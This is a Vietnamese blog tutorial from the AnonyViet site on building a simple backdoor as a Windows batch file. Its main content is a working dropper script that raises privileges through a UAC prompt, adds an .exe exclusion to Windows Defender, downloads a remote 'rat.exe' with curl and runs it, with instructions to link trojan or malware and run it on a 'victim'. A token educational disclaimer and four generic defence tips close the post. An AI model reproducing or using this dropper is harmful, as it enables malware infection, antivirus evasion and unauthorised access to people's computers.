• Network
  • Security
  • Software
  • Thủ thuật
  • Tin tức
  • Video hướng dẫn
  • Donate – Mời AnonyViet ly Cafe ☕
AnonyViet
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC
No Result
View All Result
AnonyViet
No Result
View All Result

Cách tạo Backdoor đơn giản với CMD

Hevin by Hevin
in Virus-Trojan-Rat
Reading Time: 4 mins read
A A
1

Mục lục bài viết

  1. Cách tạo Backdoor đơn giản chỉ với một tập lệnh Batch
  2. Cách phòng chống Backdoor

Như chúng ta đã biết, trong ngành an ninh mạng, Backdoor là một phần mềm độc hại nó bỏ qua các xác thực ở trong một hệ thống nào đó, truy cập trái phép. Không chỉ vậy, các hacker còn sử dụng nó để đánh cắp dữ liệu, tấn công mạng,… Và ngày hôm nay, mình sẽ hướng dẫn cho các bạn tạo một em Backdoor đơn giản chỉ với 1 tập lệnh Batch đơn giản nhé. Dành cho những bạn nào chưa biết về Backdoor thì hãy đọc bài viết này hoặc bạn có thể tìm hiểu tại đây. Được rồi chúng ta vào vấn đề chính thôi

Tham gia kênh Telegram của AnonyViet  👉 Link 👈

Lưu ý: Bài viết này chỉ dành cho mục đích giáo dục. Mọi hành vi phạm pháp Anonyviet sẽ không chịu toàn bộ trách nhiệm mà bạn đã gây ra

Các bài viết liên quan

tang dung luong o C khi dung zalo

Cách giải phóng dung lượng Zalo trên ổ C vẫn giữ nguyên dữ liệu

07/02/2023 - Updated on 08/02/2023
Tracert

8 lệnh CMD giúp bạn quản lý mạng trên Windows

30/12/2022 - Updated on 02/01/2023
Tất tần tật về Windows Terminal 2

Tất tần tật về Windows Terminal

11/08/2022
tao ho ca canh cmd

Hướng dẫn tạo Hồ Cá cảnh siêu đẹp bằng CMD trên Windows

18/02/2022

Cách tạo Backdoor đơn giản chỉ với một tập lệnh Batch

Để tạo được 1 Backdoor, trước tiên bạn hãy tạo một file có đuôi .bat sau đó copy đoạn code sau

tạo Backdoor đơn giản với file Bacth

@echo off

>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"

if '%errorlevel%' NEQ '0' (
    goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    set params = %*:"=""
    echo UAC.ShellExecute "cmd.exe", "/c %~s0 %params%", "", "runas", 1 >> "%temp%\getadmin.vbs"

    "%temp%\getadmin.vbs"
    del "%temp%\getadmin.vbs"
    exit /B

:gotAdmin
    pushd "%CD%"
    CD /D "%~dp0"
Powershell -Command "Set-MpPreference -ExclusionExtension exe"
cd %TEMP%
curl "paste link backdoor của bạn ở đây" -o rat.exe
rat.exe

Ở đoạn code trên, chúng ta cần thay đổi một chút ở dòng code thứ 2 từ dưới lên, các bạn hãy tạo một liên kết downloads trực tiếp về máy, hãy đảm bảo rằng liên kết đó phải chứa virus trojan, malware,… tùy bạn muốn, tiếp đến là hãy đặt tên backdoor mà bạn muốn tải về máy nạn nhân, mình để tên là rat.exe Như vậy chúng ta đã tạo xong Backdoor. Bây giờ mình sẽ giải thích cách thức hoạt động nhé

Cách hoạt động như sau:

Tập lệnh này cấp các đặc quyền của quản trị viên, sau đó tải xuống và thực thi một tệp có tên “rat.exe” từ một máy chủ từ xa.Trước tiên, mình đã sử dụng lệnh cacls để kiểm tra các quyền trên tệp hệ thống nằm ở “%SYSTEMROOT%\system32\config\system”. Nếu lệnh này lỗi, thì tập lệnh sẽ chuyển sang nhãn UACPrompt, nhãn này sẽ tạo tập lệnh VB (Visual Basic) để nhắc nạn nhân chạy tập lệnh với quyền quản trị viên. Nếu lệnh cacls không có lỗi thì tập lệnh sẽ nhảy tới nhãn gotAdmin và tiến hành thực thi phần còn lại. Chúng ta có thể thấy rằng, nhãn gotAdmin thay đổi thư mục chứa có chứa lệnh pushd và CD. Sau đó, nó sẽ chạy lệnh PowerShell để đặt tùy chọn cho các phần mở rộng loại trừ tệp thành exe. Cuối cùng, nó chuyển sang thư mục %TEMP% và sử dụng lệnh curl để tải xuống “rat.exe” từ một máy chủ từ xa. Tiếp đến nó sẽ chạy tệp đã tải xuống bằng lệnh rat.exe.

Như vậy, Backdoor này hoạt động rất đơn giản, nếu máy cài 2 Antivirus trở lên thì Backdoor này trở nên vô ích và nạn nhân sẽ phát hiện. Sau đây mình sẽ nói ra một số cách phòng chống Backdoor để mọi người cùng biết và né tránh

Cách phòng chống Backdoor

1.Xác minh nguồn gốc và tính xác thực của bất kì file hoặc chương trình trước khi chạy

2.Cập nhật các phiên bản phầm nềm chống Virus mới nhất

3.Không tải các phần mềm không rõ nguồn gốc

4.Sử dụng tường lửa

Bài viết đến đây là hết rồi, mình mong các bạn học được điều gì đó từ bài viết này. Chúc các bạn có một ngày thật tốt lành !

 

Bạn cũng có thể đọc thêm bài Villain – Bypass AntiVirus chiếm quyền shell Windows và Linux tai website Anonyviet.com

Bài viết đạt: 5/5 - (2 bình chọn)
Tags: backdoorcmdvbs
Hevin

Hevin

Related Posts

cach lay certificate phan mem khac
Virus-Trojan-Rat

Cấy Certificate từ App khác vào Virus để Bypass AV

08/01/2023
AnonyvietTrojan v1.2 - Update cho Linux OS và chức năng đính kèm virus 3
Virus-Trojan-Rat

AnonyvietTrojan v1.2 – Update cho Linux OS và chức năng đính kèm virus

04/12/2022 - Updated on 11/12/2022
Villain - Bypass AntiVirus chiếm quyền Shell Windows và Linux 4
Virus-Trojan-Rat

Villain – Bypass AntiVirus chiếm quyền Shell Windows và Linux

26/11/2022
AT v1.1 - Update chức năng mã hóa RAT vượt qua Windows Defender
Virus-Trojan-Rat

AnonyvietTrojan v1.1 – Update mã hóa RAT vượt qua Windows Defender

04/11/2022
AnonyvietTrojan - Công cụ giúp Virus vượt qua Windows Defender
Virus-Trojan-Rat

AnonyvietTrojan – Công cụ giúp Virus vượt qua Windows Defender

22/09/2022 - Updated on 03/12/2022
Ransomware là gì? 5
Virus-Trojan-Rat

Ransomware là gì?

15/07/2022
Next Post
Erotomania la gi

Erotomania là gì? Một chứng rối loạn tâm thần khi yêu

guest

guest

Website này sử dụng Akismet để hạn chế spam. Tìm hiểu bình luận của bạn được duyệt như thế nào.

1 Comment
oldest
newest
Inline Feedbacks
View all comments
Poohny
Poohny
2 months ago

hay

Reply
wpdiscuz   wpDiscuz

Asia 300×600

Liên hệ Quảng Cáo

Lien he AnonyViet

Đối tác —

Fshare

Các bài mới

Hướng dẫn tự tạo Bot ChatGPT trên Telegram 6

Hướng dẫn tự tạo Bot ChatGPT trên Telegram

27/03/2023
Cách sử dụng ChatGPT-4 miễn phí trên Chrome và FireFox 7

Cách sử dụng ChatGPT-4 miễn phí trên Chrome và FireFox

27/03/2023
Cách mở khóa tính năng FM Radio ẩn trên điện thoại 8

Cách mở khóa tính năng FM Radio ẩn trên điện thoại

26/03/2023
cac nhom hacker apt tren the gioi

Tổng hợp các nhóm Hacker APT trên thế giới

25/03/2023
Cách dùng AI của DALL-E 2 để tạo hình ảnh theo ý bạn 9

Cách dùng AI của DALL-E 2 để tạo hình ảnh theo ý bạn

24/03/2023

Ads

Giới thiệu

AnonyViet

AnonyViet

Nơi chia sẻ những kiến thức mà bạn chưa từng được học trên ghế nhà trường!

Chúng tôi sẵn sàng đón những ý kiến đóng góp, cũng như bài viết của các bạn gửi đến AnonyViet.

Hãy cùng AnonyViet xây dựng một cộng đồng CNTT lớn mạnh nhất!

Giới thiệu

AnonyViet là Website chia sẻ miễn phí tất cả các kiến thức về công nghệ thông tin. AnonyViet cung cấp mọi giải pháp về mạng máy tính, phần mềm, đồ họa và MMO.

Liên hệ

Email: anonyviet.com[@]gmail.com

1409 Hill Street #01-01A
Old Hill Street Police Station
Singapore 179369

 

Bản quyền: DMCA.com Protection Status

Phản hồi gần đây

  • olalavui trong Tạo VPS bằng Google Cloud miễn phí 2021
  • thái trong Download IObit Uninstaller 12 Full Key – Gỡ bỏ phần mềm tận gốc
  • tiến trong Hướng dẫn Fake link Facebook để spam
  • Mạnh Cường trong Cách đăng ký và sử dụng Google Bard – AI của Google
  • Co Dang trong Cách Active Microsoft 365 Miễn Phí
https://shbet8.org

©2023 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google Bing Github Github stackoverflow Youtube wikipedia reddit iwinclublink.app tải game iwin tải iwin apk tải tdtc w88 top tải win456 iwin888 ku11net.co ku fun twin F8BET https://new8869.com https://okuytin.com hi 88

No Result
View All Result
  • Tin tức
  • Network
    • Mạng cơ bản
    • Hyper-V
    • Linux
    • Windown Server 2012
  • Security
    • Basic Hacking
    • Deface
    • Kali Linux / Parrot
    • SQL Injection
  • Thủ thuật
    • Khóa Học Miễn Phí
    • Code
    • Mẹo Vặt Máy Tính
    • Facebook
    • Windows 7/8/10/11
    • Đồ Họa
    • Video
  • Software
    • Phần mềm máy tính
    • Phần mềm điện thoại
  • Tin học văn phòng
  • Kiến thức
  • MMO
    • Advertisers – Publishers
    • Affiliate Program
    • Kiếm tiền bằng điện thoại
    • Pay Per Click – PPC

©2023 AnonyViet - Chúng tôi mang đến cho bạn những kiến thức bổ ích về Công nghệ. Google Bing Github Github stackoverflow Youtube wikipedia reddit iwinclublink.app tải game iwin tải iwin apk tải tdtc w88 top tải win456 iwin888 ku11net.co ku fun twin F8BET https://new8869.com https://okuytin.com hi 88

wpDiscuz
!

Ads

Ads Blocker Detected!!! - Vui lòng tắt Ad Blocker!!!

Vui lòng tắt Ad Blocker

Có vẻ như bạn đang bật trình chặn Quảng cáo.

{Trường hợp bạn đang dùng trình duyệt từ Facebook, hãy copy link bài viết qua Chrome để xem nội dung, như vậy sẽ không bị chặn}

Website chúng tôi duy trì nhờ vào doanh thu quảng cáo, vì vậy hãy tắt trình chặn quảng cáo để chúng tôi có kinh phí chi trả tiền thuê Server, xin cảm ơn!

I've disable Adblock - Tôi đã tắt Adblock